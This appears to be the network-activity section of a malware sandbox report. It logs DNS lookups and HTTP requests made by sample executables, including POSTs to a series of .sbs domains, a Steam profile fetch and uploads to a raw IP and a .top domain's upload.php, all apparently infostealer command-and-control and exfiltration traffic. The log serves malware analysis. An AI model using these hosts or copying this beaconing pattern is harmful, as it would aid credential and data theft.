                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: occupy-blushi.sbs
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Tue, 26 Nov 2024 01:58:29 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=nb9nrkoe4ki6t178jungolbmle; expires=Fri, 21-Mar-2025 19:45:07 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  cf-cache-status: DYNAMIC
                                  vary: accept-encoding
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QZepQ%2F%2BKIePGCEYuLnFhgMid5XkOvMUwQt8lNKMyp4IKB8NBhqZWYeeUnJtKwd2bQMHypciLWtYDapi8W0uU8TLqedhia%2Bk0JsoCHx4wnCRuyZ1MXHfNi4tUm0Te3cIqygniWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8e86460ecef8634c-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=66113&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2859&recv_bytes=585&delivery_rate=59235&cwnd=253&unsent_bytes=0&cid=9ff8c786edde2575&ts=296&x=0"
                                • flag-us
                                  DNS
                                  blade-govern.sbs
                                  72c1b8c8ee.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  blade-govern.sbs
                                  IN A
                                  Response
                                  blade-govern.sbs
                                  IN A
                                  172.67.153.209
                                  blade-govern.sbs
                                  IN A
                                  104.21.80.208
                                • flag-us
                                  POST
                                  https://blade-govern.sbs/api
                                  72c1b8c8ee.exe
                                  Remote address:
                                  172.67.153.209:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: blade-govern.sbs
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Tue, 26 Nov 2024 01:58:29 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=rkftdc2s449259k62i9aam3e1g; expires=Fri, 21-Mar-2025 19:45:08 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  cf-cache-status: DYNAMIC
                                  vary: accept-encoding
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FV%2FA7msgYMRJdwmPd1xqkTJgufk2ZIYGXckRpRs4Baa%2B%2BzFzfeRg%2FZGAcBuuEo2toa2Sf5ojja8EIcfU%2B1mjVeqBxuecZQKgF49qGbSbyaHBslOgAEU4Pbz2Ty5g2YaE03bU"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8e864611aed66413-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=62636&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2856&recv_bytes=584&delivery_rate=62490&cwnd=253&unsent_bytes=0&cid=d27be985b453c24d&ts=279&x=0"
                                • flag-us
                                  DNS
                                  story-tense-faz.sbs
                                  72c1b8c8ee.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  story-tense-faz.sbs
                                  IN A
                                  Response
                                  story-tense-faz.sbs
                                  IN A
                                  104.21.1.25
                                  story-tense-faz.sbs
                                  IN A
                                  172.67.151.225
                                • flag-us
                                  POST
                                  https://story-tense-faz.sbs/api
                                  72c1b8c8ee.exe
                                  Remote address:
                                  104.21.1.25:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: story-tense-faz.sbs
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Tue, 26 Nov 2024 01:58:29 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=0kb8osvf8fou92di10vnc7nafr; expires=Fri, 21-Mar-2025 19:45:08 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  cf-cache-status: DYNAMIC
                                  vary: accept-encoding
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CAEMfNTzaRhqBeF87Vm9ZzwjqBB5vQSMLtHArFUl9udBBWvvTtZMAQJlgJq3ZGJ8Gpmf9ym3Vuxp169bwOZYyVzIz%2FfCX6BIYY8olr474g8fME%2F%2FGKOZ01%2BD%2BqcJWspZC4I1XTSk"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8e8646149e2a4195-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=60713&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2865&recv_bytes=587&delivery_rate=64251&cwnd=251&unsent_bytes=0&cid=05c001eb738c4a0e&ts=257&x=0"
                                • flag-us
                                  DNS
                                  leg-sate-boat.sbs
                                  72c1b8c8ee.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  leg-sate-boat.sbs
                                  IN A
                                  Response
                                • flag-us
                                  DNS
                                  disobey-curly.sbs
                                  72c1b8c8ee.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  disobey-curly.sbs
                                  IN A
                                  Response
                                  disobey-curly.sbs
                                  IN A
                                  172.67.223.140
                                  disobey-curly.sbs
                                  IN A
                                  104.21.70.128
                                • flag-us
                                  POST
                                  https://disobey-curly.sbs/api
                                  72c1b8c8ee.exe
                                  Remote address:
                                  172.67.223.140:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: disobey-curly.sbs
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Tue, 26 Nov 2024 01:58:30 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=clrfrrp4p673vaofrholkqsorb; expires=Fri, 21-Mar-2025 19:45:09 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  cf-cache-status: DYNAMIC
                                  vary: accept-encoding
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R2CRW9ZP5x1wsFUG6CO%2F7BYhpXjRvhvyadROMa%2FKISF9GXkEzJlfRcG1qmMFy3Am7WHLZzPHWDfAaOZkqwTWWm3VBrnt%2Bvo7JuVB%2FdFLpEQR0BFt94mIPpk2sxrX3GKmZayaEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8e8646180efc947d-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=62053&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2862&recv_bytes=585&delivery_rate=55473&cwnd=253&unsent_bytes=0&cid=f3cdef6c148ba31a&ts=255&x=0"
                                • flag-us
                                  DNS
                                  motion-treesz.sbs
                                  72c1b8c8ee.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  motion-treesz.sbs
                                  IN A
                                  Response
                                  motion-treesz.sbs
                                  IN A
                                  104.21.94.231
                                  motion-treesz.sbs
                                  IN A
                                  172.67.141.76
                                • flag-us
                                  POST
                                  https://motion-treesz.sbs/api
                                  72c1b8c8ee.exe
                                  Remote address:
                                  104.21.94.231:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: motion-treesz.sbs
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Tue, 26 Nov 2024 01:58:30 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=s16gsg67c6hft91fovk3ckr0fp; expires=Fri, 21-Mar-2025 19:45:09 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  cf-cache-status: DYNAMIC
                                  vary: accept-encoding
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iex5iz7HZFmiggYTa5uVBkgFIjGYMExJq6tBYnrxFs59n31LdpR3tPX1DRr%2FXzz%2Fe3Fn0welvuEwyKIAX%2BtVXWADSYZBANoAgs9yZrQZLLAMAmicm4KslNixZLFeauS0kbKViw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8e86461abe6e9494-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=61468&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2859&recv_bytes=585&delivery_rate=63025&cwnd=253&unsent_bytes=0&cid=c575de0f3788be7e&ts=277&x=0"
                                • flag-us
                                  DNS
                                  powerful-avoids.sbs
                                  72c1b8c8ee.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  powerful-avoids.sbs
                                  IN A
                                  Response
                                  powerful-avoids.sbs
                                  IN A
                                  104.21.19.173
                                  powerful-avoids.sbs
                                  IN A
                                  172.67.187.4
                                • flag-us
                                  POST
                                  https://powerful-avoids.sbs/api
                                  72c1b8c8ee.exe
                                  Remote address:
                                  104.21.19.173:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: powerful-avoids.sbs
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Tue, 26 Nov 2024 01:58:31 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=rue3g4m195b50r52djkrd2ff0e; expires=Fri, 21-Mar-2025 19:45:10 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  cf-cache-status: DYNAMIC
                                  vary: accept-encoding
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vg0XbikNlfuJYzVyDRhNwOqHITZ35XiE%2FRBH00LY%2FeStuPk7gppCAo2DUCC8wt8jJ6gq0F9DxhvJrL65So0rCTBb%2Bxj%2FKkoKls6y41f%2BOyiT9GS74%2B5G9rqK9jcuOb84EQqywxug"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8e86461dcf77be98-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=65721&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2866&recv_bytes=587&delivery_rate=59996&cwnd=253&unsent_bytes=0&cid=4da52e9da1a1bce3&ts=287&x=0"
                                • flag-us
                                  DNS
                                  steamcommunity.com
                                  72c1b8c8ee.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  steamcommunity.com
                                  IN A
                                  Response
                                  steamcommunity.com
                                  IN A
                                  2.22.99.85
                                • flag-gb
                                  GET
                                  https://steamcommunity.com/profiles/76561199724331900
                                  72c1b8c8ee.exe
                                  Remote address:
                                  2.22.99.85:443
                                  Request
                                  GET /profiles/76561199724331900 HTTP/1.1
                                  Connection: Keep-Alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Host: steamcommunity.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                  Cache-Control: no-cache
                                  Date: Tue, 26 Nov 2024 01:58:32 GMT
                                  Content-Length: 35631
                                  Connection: keep-alive
                                  Set-Cookie: sessionid=adb9a85357a13eb8fd6ad173; Path=/; Secure; SameSite=None
                                  Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                                • flag-ru
                                  GET
                                  http://185.215.113.206/
                                  f8bcf7e83e.exe
                                  Remote address:
                                  185.215.113.206:80
                                  Request
                                  GET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Tue, 26 Nov 2024 01:58:32 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                • flag-ru
                                  POST
                                  http://185.215.113.206/c4becf79229cb002.php
                                  f8bcf7e83e.exe
                                  Remote address:
                                  185.215.113.206:80
                                  Request
                                  POST /c4becf79229cb002.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGI
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Tue, 26 Nov 2024 01:58:32 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                • flag-us
                                  DNS
                                  marshal-zhukov.com
                                  72c1b8c8ee.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  marshal-zhukov.com
                                  IN A
                                  Response
                                  marshal-zhukov.com
                                  IN A
                                  172.67.160.80
                                  marshal-zhukov.com
                                  IN A
                                  104.21.82.174
                                • flag-us
                                  POST
                                  https://marshal-zhukov.com/api
                                  72c1b8c8ee.exe
                                  Remote address:
                                  172.67.160.80:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: marshal-zhukov.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Tue, 26 Nov 2024 01:58:32 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=el2a7s4ihrr59utg8sl89q0ttb; expires=Fri, 21-Mar-2025 19:45:11 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  cf-cache-status: DYNAMIC
                                  vary: accept-encoding
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lTNSS0DLZKl9RRpIjF1K8nNyn2zAllxZFFKEJ8%2B8g8RctA%2BnS9A5i8domDg3UOq3Jqu44035MFJFZDwouV8dBGAslRaiy1swkF%2BeVFiNz1CzDsycOrN4cEkP%2FMhYfTBy%2BltngFs%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8e86462718f49511-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=60820&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2865&recv_bytes=586&delivery_rate=64406&cwnd=248&unsent_bytes=0&cid=a888be0e832397fa&ts=266&x=0"
                                • flag-us
                                  DNS
                                  fvtekk5pn.top
                                  ba9783936d.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  fvtekk5pn.top
                                  IN A
                                  Response
                                  fvtekk5pn.top
                                  IN A
                                  34.116.198.130
                                • flag-us
                                  DNS
                                  fvtekk5pn.top
                                  ba9783936d.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  fvtekk5pn.top
                                  IN AAAA
                                  Response
                                • flag-pl
                                  POST
                                  http://fvtekk5pn.top/v1/upload.php
                                  ba9783936d.exe
                                  Remote address:
                                  34.116.198.130:80
                                  Request
                                  POST /v1/upload.php HTTP/1.1
                                  Host: fvtekk5pn.top
                                  Accept: */*
                                  Content-Length: 464
                                  Content-Type: multipart/form-data; boundary=------------------------dCelh85WdGEGoMoDsaWGUL
                                  Response
                                  HTTP/1.1 200 OK
                                  server: nginx/1.24.0 (Ubuntu)
                                  date: Tue, 26 Nov 2024 01:58:46 GMT
                                  content-type: text/plain; charset=utf-8
                                  content-length: 2
                                  x-ratelimit-limit: 30
                                  x-ratelimit-remaining: 25
                                  x-ratelimit-reset: 1732587936
                                  etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                • flag-us
                                  DNS
                                  youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube.com
                                  IN A
                                  Response
                                  youtube.com
                                  IN A
                                  172.217.169.78
                                • flag-us
                                  DNS
                                  youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube.com
                                  IN A
                                • flag-us
                                  DNS
                                  spocs.getpocket.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  spocs.getpocket.com
                                  IN A
                                  Response
                                  spocs.getpocket.com
                                  IN CNAME
                                  prod.ads.prod.webservices.mozgcp.net
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.188.166
                                • flag-us
                                  DNS
                                  getpocket.cdn.mozilla.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  getpocket.cdn.mozilla.net
                                  IN A
                                  Response
                                  getpocket.cdn.mozilla.net
                                  IN CNAME
                                  getpocket-cdn.prod.mozaws.net
                                  getpocket-cdn.prod.mozaws.net
                                  IN CNAME
                                  prod.pocket.prod.cloudops.mozgcp.net
                                  prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                  34.120.5.221
                                • flag-us
                                  DNS
                                  prod.ads.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.188.166
                                • flag-us
                                  DNS
                                  prod.ads.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                • flag-us
                                  DNS
                                  prod.pocket.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                  Response
                                  prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                  34.120.5.221
                                • flag-us
                                  DNS
                                  prod.pocket.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                • flag-us
                                  DNS
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN A
                                  34.160.144.191
                                • flag-us
                                  DNS
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN AAAA
                                  2600:1901:0:92a9::
                                • flag-us
                                  GET
                                  https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                                  firefox.exe
                                  Remote address:
                                  34.120.5.221:443
                                  Request
                                  GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                                  host: getpocket.cdn.mozilla.net
                                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                                  accept: */*
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  sec-fetch-dest: empty
                                  sec-fetch-mode: cors
                                  sec-fetch-site: cross-site
                                  if-none-match: W/"5395-zuqlHshIosLNxsVZ1yDB7WQXaJg"
                                  te: trailers
                                • flag-us
                                  DNS
                                  firefox-settings-attachments.cdn.mozilla.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  firefox-settings-attachments.cdn.mozilla.net
                                  IN A
                                  Response
                                  firefox-settings-attachments.cdn.mozilla.net
                                  IN CNAME
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.121.53
                                • flag-us
                                  DNS
                                  prod.ads.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  prod.pocket.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.pocket.prod.cloudops.mozgcp.net
                                  IN AAAA
                                  Response
                                  prod.pocket.prod.cloudops.mozgcp.net
                                  IN AAAA
                                  2600:1901:0:524c::
                                • flag-us
                                  DNS
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.149.100.209
                                • flag-us
                                  DNS
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.121.53
                                • flag-us
                                  DNS
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-gb
                                  GET
                                  https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                                  firefox.exe
                                  Remote address:
                                  172.217.169.78:443
                                  Request
                                  GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                                  host: youtube.com
                                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  upgrade-insecure-requests: 1
                                  sec-fetch-dest: document
                                  sec-fetch-mode: navigate
                                  sec-fetch-site: none
                                  sec-fetch-user: ?1
                                  te: trailers
                                • flag-us
                                  DNS
                                  youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube.com
                                  IN A
                                  Response
                                  youtube.com
                                  IN A
                                  172.217.169.78
                                • flag-us
                                  DNS
                                  youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube.com
                                  IN AAAA
                                  Response
                                  youtube.com
                                  IN AAAA
                                  2a00:1450:4009:819::200e
                                • flag-us
                                  DNS
                                  shavar.prod.mozaws.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  shavar.prod.mozaws.net
                                  IN A
                                  Response
                                  shavar.prod.mozaws.net
                                  IN A
                                  52.32.237.164
                                  shavar.prod.mozaws.net
                                  IN A
                                  52.27.142.243
                                  shavar.prod.mozaws.net
                                  IN A
                                  34.209.229.249
                                • flag-us
                                  DNS
                                  shavar.prod.mozaws.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  shavar.prod.mozaws.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  shavar.prod.mozaws.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  shavar.prod.mozaws.net
                                  IN AAAA
                                • flag-us
                                  DNS
                                  shavar.prod.mozaws.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  shavar.prod.mozaws.net
                                  IN AAAA
                                • flag-us
                                  DNS
                                  www.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.youtube.com
                                  IN A
                                  Response
                                  www.youtube.com
                                  IN CNAME
                                  youtube-ui.l.google.com
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.78
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.180.14
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.16.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.179.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.238
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.204.78
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.206
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.14
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.212.206
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.46
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.46
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.201.110
